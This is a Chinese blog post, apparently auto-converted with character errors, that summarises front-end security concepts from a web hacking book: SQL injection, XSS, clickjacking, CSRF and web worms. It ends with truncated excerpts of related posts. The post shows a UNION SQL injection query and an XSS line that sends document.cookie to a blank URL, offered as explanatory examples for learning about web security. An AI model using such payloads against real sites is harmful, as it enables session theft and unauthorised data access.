看了一本書《web前端黑客技術揭秘》,講了很多的前端安全性問題,這裡總結下常見的!不是挨個講解,只是講一下概念。
1、sql注入攻擊
乙個例子說明一切:
訪問:
=> select * from user_table where id=1
訪問: union select * from user_table
=> select * from user_table where id=1 union select * from user_table.
2、xss跨站指令碼攻擊
舉個例子:
訪問:"");
alert.js
new image().src=""+escape(document.cookie);
就是為了獲取珍貴的cookie,還要注意httponly cookie 的溢位洩露。
3、前端頁面劫持
分點選劫持、拖放劫持、觸屏劫持三種。
這個道理也很簡單,就是講乙個需要使用者點選或其他操作的頁面使用iframe標籤引到當前頁面,但是其餘部分都被遮擋住,然後只暴露出需要使用者點選或其他操作的部分,並且引導使用者進行操作。從而獲得使用者客戶端的各種資料,利用資料完成一些操作。
4、csrf跨站請求偽造
cspr攻擊和xss攻擊的不同之處在於它是要使用者到乙個黑客構建好的攻擊**上,從而被獲得cookie。
5、web蠕蟲問題
蠕蟲程式就是利用web2.0使用者只交的交流這乙個特點做的。
經典例子:某人發表了乙個東西,如果另乙個使用者發現並點開了。這個蠕蟲程式便使用點選人的資訊再次傳送一條相同資訊,依次擴充套件,指數增長!
用處:對用資料進行惡意操作,拒絕服務攻擊,分布式拒絕服務攻擊,散播廣告,散播網頁木馬,傳播輿情等。
其他:注意同源策略,網路上的信任與不信任,社會工程學的應用。
前端安全問題
核心 惡意指令碼注入 描述 攻擊者通過在目標 上注入惡意指令碼,使之在使用者的瀏覽器上執行。利用這些惡意指令碼,攻擊者可獲取使用者的敏感資訊如 cookie sessionid 等,進而危害資料安全。var htmlutil 2.用瀏覽器內部轉換器實現html解碼 htmldecode functi...
前端登入安全問題
對於前端開發來說安全問題很重要,我們不希望自己的密碼之類的資訊暴露出來被人獲取。如果前端不加以限制,很多重要資訊容易洩露。比如我們登入的時候,提交post,我們在瀏覽器控制台network的http請求中會直接看到密碼。http協議是明文傳輸,只要別人一抓包就可以獲取到傳輸的報文。那為了讓資料傳輸更...
常見的前端安全問題
你要離開家了,所有的父母都會說,路上注意安全,可見安全是多麼的重要!那麼作為軟體開發,有哪些危險使我們要知道並避免的呢?下面我說一些基本的需要知道的安全攻擊,以及應對方案。ps 作為乙個安全小白,了解各種各樣的防範方案真的太難了,我是真的水?歡迎補充,以增長見識 在使用者可以輸入的地方,並且將作為 ...